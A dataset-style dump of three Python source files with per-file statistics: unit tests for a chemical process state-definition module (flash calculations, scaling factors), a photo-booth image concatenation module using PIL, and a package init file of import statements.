assert len(frame.props[1].component_flow_balances) == 3
for j in frame.props[1].component_flow_balances:
assert j in frame.params.component_list
assert str(frame.props[1].component_flow_balances[j].body) == str(
frame.props[1].flow_mol * frame.props[1].mole_frac_comp[j]
- sum(
frame.props[1].flow_mol_phase[p]
* frame.props[1].mole_frac_phase_comp[p, j]
for p in frame.props[1].params.phase_list
)
)
assert isinstance(frame.props[1].sum_mole_frac, Constraint)
assert len(frame.props[1].sum_mole_frac) == 3
for p in frame.props[1].sum_mole_frac:
assert p in frame.params.phase_list
assert str(frame.props[1].sum_mole_frac[p].body) == str(
sum(
frame.props[1].mole_frac_phase_comp[p, i]
for i in frame.props[1].params.component_list
)
)
assert isinstance(frame.props[1].sum_mole_frac_out, Constraint)
assert len(frame.props[1].sum_mole_frac_out) == 1
assert str(frame.props[1].sum_mole_frac_out.body) == str(
sum(
frame.props[1].mole_frac_comp[i]
for i in frame.props[1].params.component_list
)
)
assert isinstance(frame.props[1].phase_fraction_constraint, Constraint)
assert len(frame.props[1].phase_fraction_constraint) == 3
for i in frame.props[1].phase_fraction_constraint:
assert i in frame.props[1].params.phase_list
assert str(frame.props[1].phase_fraction_constraint[i].body) == str(
frame.props[1].phase_frac[i] * frame.props[1].flow_mol
- frame.props[1].flow_mol_phase[i]
)
assert_units_consistent(frame.props[1])
class Test3PhaseDefinedStateTrueWithBounds(object):
# Test define_state method with no bounds and defined_State = False
@pytest.fixture(scope="class")
def frame(self):
m = ConcreteModel()
# Create a dummy parameter block
m.params = DummyParameterBlock(
default={
"components": {"c1": {}, "c2": {}, "c3": {}},
"phases": {
"p1": {"equation_of_state": DummyEoS},
"p2": {"equation_of_state": DummyEoS},
"p3": {"equation_of_state": DummyEoS},
},
"state_definition": modules[__name__],
"pressure_ref": 1e5,
"temperature_ref": 300,
"state_bounds": {
"flow_mol": (0, 100, 200),
"temperature": (290, 345, 400),
"pressure": (1e5, 3e5, 5e5),
},
"base_units": {
"time": pyunits.s,
"length": pyunits.m,
"mass": pyunits.kg,
"amount": pyunits.mol,
"temperature": pyunits.K,
},
}
)
# Create state block
m.props = m.params.build_state_block([1], default={"defined_state": True})
# Add necessary variables that would be built by other methods
m.props[1].dens_mol_phase = Var(m.params.phase_list, initialize=1)
m.props[1].enth_mol_phase = Var(m.params.phase_list, initialize=1)
return m
@pytest.mark.unit
def test_always_flash(self, frame):
define_state(frame.props[1])
assert frame.props[1].always_flash
@pytest.mark.unit
def test_vars(self, frame):
# Check that all necessary variables have been constructed and have
# the correct values
assert isinstance(frame.props[1].flow_mol, Var)
assert frame.props[1].flow_mol.value == 100
assert frame.props[1].flow_mol.lb == 0
assert frame.props[1].flow_mol.ub == 200
assert check_units_equivalent(frame.props[1].flow_mol, pyunits.mol / pyunits.s)
assert isinstance(frame.props[1].mole_frac_comp, Var)
assert len(frame.props[1].mole_frac_comp) == 3
for i in frame.props[1].mole_frac_comp:
assert i in frame.props[1].params.component_list
assert frame.props[1].mole_frac_comp[i].value == 1 / 3
assert check_units_equivalent(frame.props[1].mole_frac_comp, None)
assert isinstance(frame.props[1].pressure, Var)
assert frame.props[1].pressure.value == 3e5
assert frame.props[1].pressure.lb == 1e5
assert frame.props[1].pressure.ub == 5e5
assert check_units_equivalent(frame.props[1].pressure, pyunits.Pa)
assert isinstance(frame.props[1].temperature, Var)
assert frame.props[1].temperature.value == 345
assert frame.props[1].temperature.lb == 290
assert frame.props[1].temperature.ub == 400
assert check_units_equivalent(frame.props[1].temperature, pyunits.K)
assert isinstance(frame.props[1].flow_mol_phase, Var)
assert len(frame.props[1].flow_mol_phase) == 3
for i in frame.props[1].flow_mol_phase:
assert i in frame.props[1].params.phase_list
assert frame.props[1].flow_mol_phase[i].value == 100 / 3
assert frame.props[1].flow_mol_phase[i].lb == 0
assert frame.props[1].flow_mol_phase[i].ub == 200
assert check_units_equivalent(
frame.props[1].flow_mol_phase, pyunits.mol / pyunits.s
)
assert isinstance(frame.props[1].phase_frac, Var)
assert len(frame.props[1].phase_frac) == 3
for i in frame.props[1].phase_frac:
assert i in frame.props[1].params.phase_list
assert frame.props[1].phase_frac[i].value == 1 / 3
assert check_units_equivalent(frame.props[1].phase_frac, None)
assert isinstance(frame.props[1].mole_frac_phase_comp, Var)
assert len(frame.props[1].mole_frac_phase_comp) == 9
for i in frame.props[1].mole_frac_phase_comp:
assert i in [
("p1", "c1"),
("p1", "c2"),
("p1", "c3"),
("p2", "c1"),
("p2", "c2"),
("p2", "c3"),
("p3", "c1"),
("p3", "c2"),
("p3", "c3"),
]
assert frame.props[1].mole_frac_phase_comp[i].value == 1 / 3
assert check_units_equivalent(frame.props[1].mole_frac_phase_comp, None)
@pytest.mark.unit
def test_constraints(self, frame):
# Check that the correct constraints are present
assert isinstance(frame.props[1].component_flow_balances, Constraint)
assert len(frame.props[1].component_flow_balances) == 3
for j in frame.props[1].component_flow_balances:
assert j in frame.params.component_list
assert str(frame.props[1].component_flow_balances[j].body) == str(
frame.props[1].flow_mol * frame.props[1].mole_frac_comp[j]
- sum(
frame.props[1].flow_mol_phase[p]
* frame.props[1].mole_frac_phase_comp[p, j]
for p in frame.props[1].params.phase_list
)
)
assert isinstance(frame.props[1].sum_mole_frac, Constraint)
assert len(frame.props[1].sum_mole_frac) == 3
for p in frame.props[1].sum_mole_frac:
assert p in frame.params.phase_list
assert str(frame.props[1].sum_mole_frac[p].body) == str(
sum(
frame.props[1].mole_frac_phase_comp[p, i]
for i in frame.props[1].params.component_list
)
)
assert not hasattr(frame.props[1], "sum_mole_frac_out")
assert isinstance(frame.props[1].phase_fraction_constraint, Constraint)
assert len(frame.props[1].phase_fraction_constraint) == 3
for i in frame.props[1].phase_fraction_constraint:
assert i in frame.props[1].params.phase_list
assert str(frame.props[1].phase_fraction_constraint[i].body) == str(
frame.props[1].phase_frac[i] * frame.props[1].flow_mol
- frame.props[1].flow_mol_phase[i]
)
assert_units_consistent(frame.props[1])
@pytest.mark.unit
def test_initialization(self, frame):
state_initialization(frame.props[1])
assert isinstance(frame.props[1].temperature, Var)
assert isinstance(frame.props[1].pressure, Var)
assert isinstance(frame.props[1].flow_mol, Var)
assert isinstance(frame.props[1].mole_frac_comp, Var)
assert isinstance(frame.props[1].flow_mol_phase, Var)
assert isinstance(frame.props[1].flow_mol_phase_comp, Expression)
assert isinstance(frame.props[1].phase_frac, Var)
assert isinstance(frame.props[1].mole_frac_phase_comp, Var)
assert frame.props[1].temperature.value == approx(345)
assert frame.props[1].pressure.value == approx(3e5)
assert frame.props[1].flow_mol.value == approx(100)
for p in frame.props[1].phase_list:
assert frame.props[1].phase_frac[p].value == approx(1 / 3)
assert frame.props[1].flow_mol_phase[p].value == approx(100 / 3)
for j in frame.props[1].component_list:
assert frame.props[1].mole_frac_comp[j].value == approx(1 / 3)
assert frame.props[1].mole_frac_phase_comp[p, j].value == approx(1 / 3)
assert approx(100 / 9) == value(
frame.props[1].flow_mol_phase_comp[p, j]
)
frame.props[1].phase_frac["p1"].value = 0.2
frame.props[1].phase_frac["p2"].value = 0.5
frame.props[1].phase_frac["p3"].value = 0.3
state_initialization(frame.props[1])
assert frame.props[1].phase_frac["p1"].value == approx(0.2)
assert frame.props[1].flow_mol_phase["p1"].value == approx(20)
for j in frame.props[1].component_list:
assert frame.props[1].mole_frac_comp[j].value == approx(1 / 3)
assert frame.props[1].mole_frac_phase_comp["p1", j].value == approx(1 / 3)
assert approx(20 / 3) == value(frame.props[1].flow_mol_phase_comp["p1", j])
assert frame.props[1].phase_frac["p2"].value == approx(0.5)
assert frame.props[1].flow_mol_phase["p2"].value == approx(50)
for j in frame.props[1].component_list:
assert frame.props[1].mole_frac_phase_comp["p2", j].value == approx(1 / 3)
assert approx(50 / 3) == value(frame.props[1].flow_mol_phase_comp["p2", j])
assert frame.props[1].phase_frac["p3"].value == approx(0.3)
assert frame.props[1].flow_mol_phase["p3"].value == approx(30)
for j in frame.props[1].component_list:
assert frame.props[1].mole_frac_comp[j].value == approx(1 / 3)
assert frame.props[1].mole_frac_phase_comp["p3", j].value == approx(1 / 3)
assert approx(30 / 3) == value(frame.props[1].flow_mol_phase_comp["p3", j])
# To avoid side effects
for p in frame.props[1].phase_list:
frame.props[1].phase_frac[p].value = 1 / 3
state_initialization(frame.props[1])
class TestCommon(object):
@pytest.fixture(scope="class")
def frame(self):
m = ConcreteModel()
m.params = DummyParameterBlock(
default={
"components": {"c1": {}, "c2": {}, "c3": {}},
"phases": {
"a": {"equation_of_state": DummyEoS},
"b": {"equation_of_state": DummyEoS},
},
"state_definition": FTPx,
"pressure_ref": 1e5,
"temperature_ref": 300,
"state_bounds": {
"flow_mol": (0, 0.1, 0.2, pyunits.kmol / pyunits.s),
"temperature": (522, 621, 720, pyunits.degR),
"pressure": (1, 3, 5, pyunits.bar),
},
"base_units": {
"time": pyunits.s,
"length": pyunits.m,
"mass": pyunits.kg,
"amount": pyunits.mol,
"temperature": pyunits.K,
},
}
)
# Build state block
m.props = m.params.build_state_block([1], default={"defined_state": True})
# Add necessary variables that would be built by other methods
m.props[1].dens_mol_phase = Var(m.params.phase_list, initialize=1)
m.props[1].enth_mol_phase = Var(m.params.phase_list, initialize=1)
return m
@pytest.mark.unit
def test_convert_vars(self, frame):
# Check that all state var values and bounds were converted correctly
assert frame.props[1].flow_mol.value == 100
assert frame.props[1].flow_mol.lb == 0
assert frame.props[1].flow_mol.ub == 200
assert check_units_equivalent(frame.props[1].flow_mol, pyunits.mol / pyunits.s)
assert frame.props[1].pressure.value == 3e5
assert frame.props[1].pressure.lb == 1e5
assert frame.props[1].pressure.ub == 5e5
assert check_units_equivalent(frame.props[1].pressure, pyunits.Pa)
assert frame.props[1].temperature.value == 345
assert frame.props[1].temperature.lb == 290
assert frame.props[1].temperature.ub == 400
assert check_units_equivalent(frame.props[1].temperature, pyunits.K)
# Check supporting variables
assert isinstance(frame.props[1].flow_mol_phase, Var)
assert len(frame.props[1].flow_mol_phase) == 2
assert isinstance(frame.props[1].mole_frac_phase_comp, Var)
assert len(frame.props[1].mole_frac_phase_comp) == 6
assert isinstance(frame.props[1].phase_frac, Var)
assert len(frame.props[1].phase_frac) == 2
assert isinstance(frame.props[1].total_flow_balance, Constraint)
assert len(frame.props[1].total_flow_balance) == 1
assert isinstance(frame.props[1].component_flow_balances, Constraint)
assert len(frame.props[1].component_flow_balances) == 3
assert isinstance(frame.props[1].sum_mole_frac, Constraint)
assert len(frame.props[1].sum_mole_frac) == 1
assert not hasattr(frame.props[1], "sum_mole_frac_out")
assert isinstance(frame.props[1].phase_fraction_constraint, Constraint)
assert len(frame.props[1].phase_fraction_constraint) == 2
assert_units_consistent(frame)
@pytest.mark.unit
def test_calculate_scaling_factors(self, frame):
frame.props[1].calculate_scaling_factors()
assert len(frame.props[1].scaling_factor) == 22
assert frame.props[1].scaling_factor[frame.props[1].flow_mol] == 1e-2
assert frame.props[1].scaling_factor[frame.props[1].flow_mol_phase["a"]] == 1e-2
assert frame.props[1].scaling_factor[frame.props[1].flow_mol_phase["b"]] == 1e-2
assert (
frame.props[1].scaling_factor[frame.props[1].flow_mol_phase_comp["a", "c1"]]
== 1e-2
)
assert (
frame.props[1].scaling_factor[frame.props[1].flow_mol_phase_comp["a", "c2"]]
== 1e-2
)
assert (
frame.props[1].scaling_factor[frame.props[1].flow_mol_phase_comp["a", "c3"]]
== 1e-2
)
assert (
frame.props[1].scaling_factor[frame.props[1].flow_mol_phase_comp["b", "c1"]]
== 1e-2
)
assert (
frame.props[1].scaling_factor[frame.props[1].flow_mol_phase_comp["b", "c2"]]
== 1e-2
)
assert (
frame.props[1].scaling_factor[frame.props[1].flow_mol_phase_comp["b", "c3"]]
== 1e-2
)
assert frame.props[1].scaling_factor[frame.props[1].dens_mol_phase["a"]] == 1e-2
assert frame.props[1].scaling_factor[frame.props[1].dens_mol_phase["b"]] == 1e-2
assert frame.props[1].scaling_factor[frame.props[1].mole_frac_comp["c1"]] == 1e3
assert frame.props[1].scaling_factor[frame.props[1].mole_frac_comp["c2"]] == 1e3
assert frame.props[1].scaling_factor[frame.props[1].mole_frac_comp["c3"]] == 1e3
assert (
frame.props[1].scaling_factor[
frame.props[1].mole_frac_phase_comp["a", "c1"]
]
== 1e3
)
assert (
frame.props[1].scaling_factor[
frame.props[1].mole_frac_phase_comp["a", "c2"]
]
== 1e3
)
assert (
frame.props[1].scaling_factor[
frame.props[1].mole_frac_phase_comp["a", "c3"]
]
== 1e3
)
assert (
frame.props[1].scaling_factor[
frame.props[1].mole_frac_phase_comp["b", "c1"]
]
== 1e3
)
assert (
frame.props[1].scaling_factor[
frame.props[1].mole_frac_phase_comp["b", "c2"]
]
== 1e3
)
assert (
frame.props[1].scaling_factor[
frame.props[1].mole_frac_phase_comp["b", "c3"]
]
== 1e3
)
assert frame.props[1].scaling_factor[frame.props[1].pressure] == 1e-5
assert frame.props[1].scaling_factor[frame.props[1].temperature] == 1e-2
# Test General Methods
@pytest.mark.unit
def test_get_material_flow_terms(self, frame):
for (p, j) in frame.params._phase_component_set:
assert str(frame.props[1].get_material_flow_terms(p, j)) == str(
frame.props[1].flow_mol_phase_comp[p, j]
)
@pytest.mark.unit
def test_get_enthalpy_flow_terms(self, frame):
for p in frame.params.phase_list:
assert str(frame.props[1].get_enthalpy_flow_terms(p)) == str(
frame.props[1]._enthalpy_flow_term[p]
)
assert str(frame.props[1]._enthalpy_flow_term[p].expr) == str(
frame.props[1].flow_mol_phase[p] * frame.props[1].enth_mol_phase[p]
)
@pytest.mark.unit
def test_get_material_density_terms(self, frame):
for (p, j) in frame.params._phase_component_set:
assert str(frame.props[1].get_material_density_terms(p, j)) == str(
frame.props[1]._material_density_term[p, j]
)
assert str(frame.props[1]._material_density_term[p, j].expr) == str(
frame.props[1].dens_mol_phase[p]
* frame.props[1].mole_frac_phase_comp[p, j]
)
@pytest.mark.unit
def test_get_energy_density_terms(self, frame):
for p in frame.params.phase_list:
assert str(frame.props[1].get_energy_density_terms(p)) == str(
frame.props[1]._energy_density_term[p]
)
assert str(frame.props[1]._energy_density_term[p].expr) == str(
frame.props[1].dens_mol_phase[p]
* frame.props[1].energy_internal_mol_phase[p]
)
@pytest.mark.unit
def test_default_material_balance_type(self, frame):
assert (
frame.props[1].default_material_balance_type()
== MaterialBalanceType.componentTotal
)
@pytest.mark.unit
def test_default_energy_balance_type(self, frame):
assert (
frame.props[1].default_energy_balance_type()
== EnergyBalanceType.enthalpyTotal
)
@pytest.mark.unit
def test_get_material_flow_basis(self, frame):
assert frame.props[1].get_material_flow_basis() == MaterialFlowBasis.molar
@pytest.mark.unit
def test_define_state_vars(self, frame):
assert frame.props[1].define_state_vars() == {
"flow_mol": frame.props[1].flow_mol,
"mole_frac_comp": frame.props[1].mole_frac_comp,
"temperature": frame.props[1].temperature,
"pressure": frame.props[1].pressure,
}
@pytest.mark.unit
def test_define_display_vars(self, frame):
assert frame.props[1].define_display_vars() == {
"Total Molar Flowrate": frame.props[1].flow_mol,
"Total Mole Fraction": frame.props[1].mole_frac_comp,
"Temperature": frame.props[1].temperature,
"Pressure": frame.props[1].pressure,
}
@pytest.mark.unit
def test_conc_mol(self, frame):
assert isinstance(frame.props[1].conc_mol_comp, Expression)
assert len(frame.props[1].conc_mol_comp) == 3
assert isinstance(frame.props[1].conc_mol_phase_comp, Expression)
assert len(frame.props[1].conc_mol_phase_comp) == 6
@pytest.mark.unit
def test_unphysical_mol_fraction_fail(self, frame):
frame.props[1].mole_frac_comp["c1"].value = -0.1
with pytest.raises(
ValueError,
match="Component c1 has a negative mole fraction "
"in block props\[1\]. Check your initialization.",
):
frame.props[1].params.config.state_definition.state_initialization(
frame.props[1]
)
class TestModifiedRachfordRice(object):
@pytest.fixture(scope="class")
def model(self):
m = ConcreteModel(name="George")
m.component_list = ["a", "b", "c"]
m.mole_frac_comp = Var(m.component_list, initialize=1 / len(m.component_list))
m.K = {"a": 0.5, "b": 1, "c": 3}
return m
@pytest.mark.unit
def test_flash(self, model):
m = model
vl_comps_list = [["a", "b", "c"], ["b", "c"], ["a", "b"], ["b"], ["c"], [], []]
l_only_comps_list = [[], ["a"], [], ["a"], ["a", "b"], ["a", "b", "c"], []]
v_only_comps_list = [[], [], ["c"], ["c"], [], [], ["a", "b", "c"]]
eps_list = [None, 0, 0.01]
# Who will validate the validation?
assert len(vl_comps_list) == len(l_only_comps_list)
assert len(vl_comps_list) == len(v_only_comps_list)
expected_output = np.array(
[
[0.75, 0.25, 1 - 1e-5, 0.5, 1e-5, 1e-5, 1 - 1e-5],
[0.75, 0.25, 1, 0.5, 0, 0, 1],
[0.75, 0.25, 0.99, 0.5, 0.01, 0.01, 0.99],
]
)
for i in range(len(vl_comps_list)):
for j in range(len(eps_list)):
if eps_list[j] is not None:
vap_frac = _modified_rachford_rice(
m,
m.K,
vl_comps_list[i],
l_only_comps_list[i],
v_only_comps_list[i],
eps=eps_list[j],
)
else:
vap_frac = _modified_rachford_rice(
m,
m.K,
vl_comps_list[i],
l_only_comps_list[i],
v_only_comps_list[i],
)
# Convergence criterion for Newton's method is 1e-6 (because
# we expect to pass it of to IPOPT later). We cannot expect
# machine precision here.
assert expected_output[j, i] == approx(vap_frac, rel=5e-5)
@pytest.mark.unit
def test_negative_K(self, model, caplog):
m = model
m.K["a"] = -1
vap_frac = _modified_rachford_rice(m, m.K, m.component_list, [], [])
assert vap_frac is None
assert len(caplog.records) == 1
record = caplog.records[0]
assert record.levelno == idaeslog.WARNING
assert record.getMessage() == (
"While initializing block George, the vapor/liquid split ratio "
"of Component a was calculated to be negative. Check the "
"implementation of the saturation pressure, Henry's law method, "
"or liquid density."
)
m.K["a"] = 0.5
@pytest.mark.unit
def test_unphysical_mole_fracs(self, model, caplog):
m = model
m.mole_frac_comp["a"] = -20
m.mole_frac_comp["b"] = -20
m.mole_frac_comp["c"] = -20
vap_frac = _modified_rachford_rice(m, m.K, ["a"], ["b"], ["c"])
assert vap_frac is None
assert len(caplog.records) == 1
record = caplog.records[0]
assert record.levelno == idaeslog.WARNING
assert record.getMessage() == (
"Block George - phase faction initialization using "
"modified Rachford-Rice failed. This could be "
"because a component is essentially "
"nonvolatile or noncondensible, or "
"because mole fractions sum to more than "
"one."
)
m.mole_frac_comp["a"] = 1 / 3
m.mole_frac_comp["b"] = 1 / 3
m.mole_frac_comp["c"] = 1 / 3
| 41.164021
| 88
| 0.591404
| 7,978
| 62,240
| 4.427801
| 0.050765
| 0.105648
| 0.188393
| 0.070743
| 0.886426
| 0.876943
| 0.859873
| 0.848776
| 0.827969
| 0.817466
| 0
| 0.031713
| 0.28464
| 62,240
| 1,511
| 89
| 41.191264
| 0.761679
| 0.049197
| 0
| 0.708973
| 0
| 0
| 0.049845
| 0.00073
| 0
| 0
| 0
| 0
| 0.362167
| 1
| 0.04042
| false
| 0.001617
| 0.013743
| 0.000808
| 0.070331
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0f414dc3dfdf1e214fd2fd2061d5f89d78b5e307
| 10,102
|
py
|
Python
|
pibooth/pictures/concatenate.py
|
ifoche/pibooth
|
e97098ef06bfb7c43a9e74cbaa7aad10653cf487
|
[
"MIT"
] | 1
|
2018-12-17T16:40:02.000Z
|
2018-12-17T16:40:02.000Z
|
pibooth/pictures/concatenate.py
|
ifoche/pibooth
|
e97098ef06bfb7c43a9e74cbaa7aad10653cf487
|
[
"MIT"
] | null | null | null |
pibooth/pictures/concatenate.py
|
ifoche/pibooth
|
e97098ef06bfb7c43a9e74cbaa7aad10653cf487
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from PIL import Image, ImageDraw, ImageFont
from pibooth import fonts
from pibooth.pictures import sizing
def new_image_with_background(width, height, background):
"""Create a new image with the given background. The background can be
a RGB color tuple ora PIL image.
"""
if isinstance(background, (tuple, list)):
return Image.new('RGB', (width, height), color=background)
else:
image = Image.new('RGB', (width, height))
image.paste(background.resize(sizing.new_size_keep_aspect_ratio(background.size, image.size, 'outer')))
return image
def concatenate_pictures_portrait(pictures, footer_texts, bg_color, text_color, inter_width=None):
"""
Merge up to 4 PIL images in portrait orientation.
+---------+ +---------+ +---+-+---+ +---------+
| | | +-+ | | |1| | | +-+ +-+ |
| | | |1| | | +-+ | | |1| |2| |
| +-+ | | +-+ | | +-+ | | +-+ +-+ |
| |1| | | | | |2| | | |
| +-+ | | +-+ | | +-+ | | +-+ +-+ |
| | | |2| | | +-+ | | |3| |4| |
| | | +-+ | | |3| | | +-+ +-+ |
+---------+ +---------+ +---+-+---+ +---------+
"""
widths, heights = zip(*(i.size for i in pictures))
# starting here we consider that all the images have the same height and widths
if inter_width is None:
inter_width = max(heights) // 20
if len(pictures) == 1:
new_width = max(widths) + inter_width * 2
new_height = max(heights) + inter_width * 2
elif len(pictures) == 2:
new_width = max(widths) + inter_width * 2
new_height = max(heights) * 2 + inter_width * 3
elif len(pictures) == 3:
new_width = max(widths) + inter_width * 2
new_height = max(heights) * 3 + inter_width * 4
elif len(pictures) == 4:
new_width = max(widths) * 2 + inter_width * 3
new_height = max(heights) * 2 + inter_width * 3
else:
raise ValueError("List of max 4 pictures expected, got {}".format(len(pictures)))
matrix = Image.new('RGBA', (new_width, new_height))
x_offset = inter_width
y_offset = inter_width
# Consider that the photo are correctly ordered
matrix.paste(pictures[0], (x_offset, y_offset))
if len(pictures) == 2:
y_offset += (pictures[0].size[1] + inter_width)
matrix.paste(pictures[1], (x_offset, y_offset))
elif len(pictures) == 3:
y_offset += (pictures[0].size[1] + inter_width)
matrix.paste(pictures[1], (x_offset, y_offset))
y_offset += (pictures[1].size[1] + inter_width)
matrix.paste(pictures[2], (x_offset, y_offset))
elif len(pictures) == 4:
x_offset += (pictures[0].size[0] + inter_width)
matrix.paste(pictures[1], (x_offset, y_offset))
y_offset += (pictures[1].size[1] + inter_width)
x_offset = inter_width
matrix.paste(pictures[2], (x_offset, y_offset))
x_offset += (pictures[2].size[0] + inter_width)
matrix.paste(pictures[3], (x_offset, y_offset))
final_width, final_height = 2400, 3600
if not footer_texts[0] and not footer_texts[1]:
matrix_width, matrix_height = final_width, final_height
footer_size = 0
else:
matrix_width, matrix_height = 2400, 3000
footer_size = 600
matrix = matrix.resize(sizing.new_size_keep_aspect_ratio(
matrix.size, (matrix_width, matrix_height)), Image.ANTIALIAS)
final_image = new_image_with_background(final_width, final_height, bg_color)
final_image.paste(matrix, ((final_width - matrix.size[0]) // 2,
(final_height - footer_size - matrix.size[1]) // 2), mask=matrix)
if footer_size:
# Text part
draw = ImageDraw.Draw(final_image)
# Footer 1
name_font = ImageFont.truetype(fonts.get_filename("Amatic-Bold.ttf"), int(2 / 3. * footer_size))
name_width, name_height = draw.textsize(footer_texts[0], font=name_font)
footer_x = (final_width - name_width) // 2
footer_y = final_height - footer_size - 100
draw.text((footer_x, footer_y), footer_texts[0], text_color, font=name_font)
# Footer 2
date_font = ImageFont.truetype(fonts.get_filename("AmaticSC-Regular.ttf"), int(1 / 3. * footer_size))
date_width, date_height = draw.textsize(footer_texts[1], font=date_font)
footer_x = (final_width - date_width) // 2
footer_y = final_height - footer_size + 300
draw.text((footer_x, footer_y), footer_texts[1], text_color, font=date_font)
return final_image
def concatenate_pictures_landscape(pictures, footer_texts, bg_color, text_color, inter_width=None):
"""
Merge up to 4 PIL images in landscape orientation.
+-------------+ +-------------+ +-------------+ +---+-+-+-+---+
| +-+ | | +-+ +-+ | | +-+ +-+ +-+ | | |1| |2| |
| |1| | | |1| |2| | | |1| |2| |3| | | +-+ +-+ |
| +-+ | | +-+ +-+ | | +-+ +-+ +-+ | | +-+ +-+ |
| | | | | | | |3| |4| |
+-------------+ +-------------+ +-------------+ +---+-+-+-+---+
"""
widths, heights = zip(*(i.size for i in pictures))
# starting here we consider that all the images have the same height and widths
if inter_width is None:
inter_width = max(heights) // 20
if len(pictures) == 1:
new_width = max(widths) + inter_width * 2
new_height = max(heights) + inter_width * 2
elif len(pictures) == 2:
new_width = max(widths) * 2 + inter_width * 3
new_height = max(heights) + inter_width * 2
elif len(pictures) == 3:
new_width = max(widths) * 3 + inter_width * 4
new_height = max(heights) + inter_width * 2
elif len(pictures) == 4:
new_width = max(widths) * 2 + inter_width * 3
new_height = max(heights) * 2 + inter_width * 3
else:
raise ValueError("List of max 4 pictures expected, got {}".format(len(pictures)))
matrix = Image.new('RGBA', (new_width, new_height))
x_offset = inter_width
y_offset = inter_width
# Consider that the photo are correctly ordered
matrix.paste(pictures[0], (x_offset, y_offset))
if len(pictures) == 2:
x_offset += (pictures[0].size[0] + inter_width)
matrix.paste(pictures[1], (x_offset, y_offset))
elif len(pictures) == 3:
x_offset += (pictures[0].size[0] + inter_width)
matrix.paste(pictures[1], (x_offset, y_offset))
x_offset += (pictures[1].size[0] + inter_width)
matrix.paste(pictures[2], (x_offset, y_offset))
elif len(pictures) == 4:
x_offset += (pictures[0].size[0] + inter_width)
matrix.paste(pictures[1], (x_offset, y_offset))
y_offset += (pictures[1].size[1] + inter_width)
x_offset = inter_width
matrix.paste(pictures[2], (x_offset, y_offset))
x_offset += (pictures[2].size[0] + inter_width)
matrix.paste(pictures[3], (x_offset, y_offset))
final_width, final_height = 3600, 2400
if not footer_texts[0] and not footer_texts[1]:
matrix_width, matrix_height = final_width, final_height
footer_size = 0
else:
matrix_width, matrix_height = 3600, 2100
footer_size = 300
matrix = matrix.resize(sizing.new_size_keep_aspect_ratio(
matrix.size, (matrix_width, matrix_height)), Image.ANTIALIAS)
final_image = new_image_with_background(final_width, final_height, bg_color)
final_image.paste(matrix, ((final_width - matrix.size[0]) // 2,
(final_height - footer_size - matrix.size[1]) // 2), mask=matrix)
if footer_size:
# Text part
draw = ImageDraw.Draw(final_image)
# Footer 1
name_font = ImageFont.truetype(fonts.get_filename("Amatic-Bold.ttf"), int(2 / 3. * footer_size))
name_width, name_height = draw.textsize(footer_texts[0], font=name_font)
footer_x = final_width // 4 - name_width // 2
footer_y = final_height - (footer_size + name_height) // 2 - 50
draw.text((footer_x, footer_y), footer_texts[0], text_color, font=name_font)
# Footer 2
date_font = ImageFont.truetype(fonts.get_filename("AmaticSC-Regular.ttf"), int(1 / 3. * footer_size))
date_width, date_height = draw.textsize(footer_texts[1], font=date_font)
footer_x = 3 * final_width // 4 - date_width // 2
footer_y = final_height - (footer_size + date_height) // 2 - 50
draw.text((footer_x, footer_y), footer_texts[1], text_color, font=date_font)
return final_image
def concatenate_pictures(pictures, footer_texts=('', ''), bg_color=(255, 255, 255), text_color=(0, 0, 0), orientation="auto", inter_width=None):
"""
Merge up to 4 PIL images and retrun concatenated image as a new PIL image object.
Configuration of the final picture depends on the number of given pictures.
"""
if orientation == "auto":
# Use the size of the first picture to determine the orientation
if pictures[0].size[0] > pictures[0].size[1]:
orientation = "landscape"
else:
orientation = "portrait"
elif orientation == "revauto":
# Use the size of the first picture to determine the reversed orientation
if pictures[0].size[0] < pictures[0].size[1]:
orientation = "landscape"
else:
orientation = "portrait"
if orientation == "portrait":
return concatenate_pictures_portrait(pictures, footer_texts, bg_color, text_color, inter_width)
elif orientation == "landscape":
return concatenate_pictures_landscape(pictures, footer_texts, bg_color, text_color, inter_width)
else:
raise ValueError("Invalid orientation '{}'".format(orientation))
| 44.113537
| 144
| 0.582162
| 1,258
| 10,102
| 4.453895
| 0.110493
| 0.076745
| 0.039443
| 0.034981
| 0.855435
| 0.839372
| 0.839372
| 0.829734
| 0.821524
| 0.788506
| 0
| 0.029456
| 0.270738
| 10,102
| 228
| 145
| 44.307018
| 0.731098
| 0.183033
| 0
| 0.751634
| 0
| 0
| 0.031662
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026144
| false
| 0
| 0.019608
| 0
| 0.084967
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0e7c0584389787b5ee6c470822eb1e2484990c42
| 180
|
py
|
Python
|
textbox/data/dataloader/__init__.py
|
JBoRu/TextBox-1
|
0dcbaa153acc507e3d55075312d7ca5d23146e03
|
[
"MIT"
] | 1
|
2021-08-12T01:08:09.000Z
|
2021-08-12T01:08:09.000Z
|
textbox/data/dataloader/__init__.py
|
JBoRu/TextBox-1
|
0dcbaa153acc507e3d55075312d7ca5d23146e03
|
[
"MIT"
] | null | null | null |
textbox/data/dataloader/__init__.py
|
JBoRu/TextBox-1
|
0dcbaa153acc507e3d55075312d7ca5d23146e03
|
[
"MIT"
] | null | null | null |
from textbox.data.dataloader.abstract_dataloader import *
from textbox.data.dataloader.single_sent_dataloader import *
from textbox.data.dataloader.paired_sent_dataloader import *
| 45
| 60
| 0.866667
| 23
| 180
| 6.565217
| 0.391304
| 0.218543
| 0.298013
| 0.496689
| 0.543046
| 0.543046
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066667
| 180
| 3
| 61
| 60
| 0.89881
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
